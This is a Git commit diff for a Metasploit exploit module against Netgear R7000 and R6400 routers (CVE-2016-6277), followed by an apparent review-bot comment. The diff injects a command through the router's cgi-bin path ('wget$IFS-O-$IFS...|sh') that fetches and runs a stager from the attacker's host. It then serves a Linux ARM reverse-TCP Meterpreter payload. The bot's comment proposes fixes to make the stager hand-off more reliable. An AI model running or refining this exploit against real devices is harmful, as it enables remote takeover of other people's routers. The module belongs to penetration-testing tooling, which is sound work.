Merge pull request #1 from wvu-r7/pr/7968

Convert to CmdStager for R7000 exploit
Carter 2017-03-08 09:09:47 -05:00 committed by GitHub
commit fbf7f55485
1 changed files with 33 additions and 27 deletions


@ -6,9 +6,11 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -18,11 +20,11 @@ class MetasploitModule < Msf::Exploit::Remote
Netgear R7000 and R6400 router firmware version 1.0.7.2_1.1.93 and possibly earlier.
},
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Platform' => 'linux',
'Author' => ['thecarterb', 'Acew0rm'],
'DefaultTarget' => 0,
'Privileged' => false,
'Arch' => [ARCH_CMD],
'Privileged' => true,
'Arch' => ARCH_ARMLE,
'Targets' => [
[ 'Automatic Target', { } ]
],
@ -35,20 +37,19 @@ class MetasploitModule < Msf::Exploit::Remote
[ 'CVE', '2016-6277']
],
'DisclosureDate' => 'Dec 06 2016',
'Payload' =>
'DefaultOptions' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => "\x20"
},
'DefaultOptions' => { 'WfsDelay' => 10}
'PAYLOAD' => 'linux/armle/mettle_reverse_tcp'
}
))
register_options(
[
Opt::RPORT(80)
], self.class)
end
deregister_options('URIPATH')
end
def scrape(text, start_trig, end_trig)
text[/#{start_trig}(.*?)#{end_trig}/m, 1]
@ -80,24 +81,29 @@ class MetasploitModule < Msf::Exploit::Remote
end
def exploit
check
return if check == CheckCode::Safe
pe = payload.encoded
pe.to_s
pe.gsub!('{','')
pe.gsub!('}','')
#cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join
#str = "echo$IFS-ne$IFS\"#{cmd}\"|/bin/sh&"
print_status('Sending encoded command...')
vprint_status("Encoded command: #{pe}")
send_request_cgi({
'uri' => "/cgi-bin/;#{pe}",
'method' => 'GET'
})
print_status('Giving the handler time to run...')
@cmdstager = generate_cmdstager(flavor: :wget).join(';')
send_request_cgi(
'method' => 'GET',
'uri' => "/cgi-bin/;wget$IFS-O-$IFS'#{srvhost_addr}:#{srvport}'|sh"
)
end
# Return CmdStager on first request, payload on second
def on_request_uri(cli, request)
if @cmdstager
send_response(cli, @cmdstager)
@cmdstager = nil
else
super
end
end
# XXX: This is the only way to force this resource
def resource_uri
'/'
end
end
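Review bot: The stager/payload hand-off in on_request_uri is keyed only on whether @cmdstager is still set, so whatever client reaches the listener first consumes the stager regardless of request.uri or who sent it; a stray probe, a proxy, or a second run against the same target means the router's `wget$IFS-O-$IFS'host:port'|sh` from exploit pipes the raw ARM ELF into sh and the "first request gets the stager, second gets the payload" comment no longer holds. Gating the hand-off on the peer looks like the minimal fix, e.g. `if @cmdstager && cli.peerhost == rhost`, with a `vprint_status("Unexpected request from #{cli.peerhost}")` on the else path so a consumed stager is visible in the log rather than silent; confirm cli exposes peerhost in this Rex client version. The URI built in exploit also interpolates srvhost_addr bare, so an IPv6 SRVHOST would presumably need bracketing before wget accepts it, which is worth a comment or a guard if the module is meant to support it.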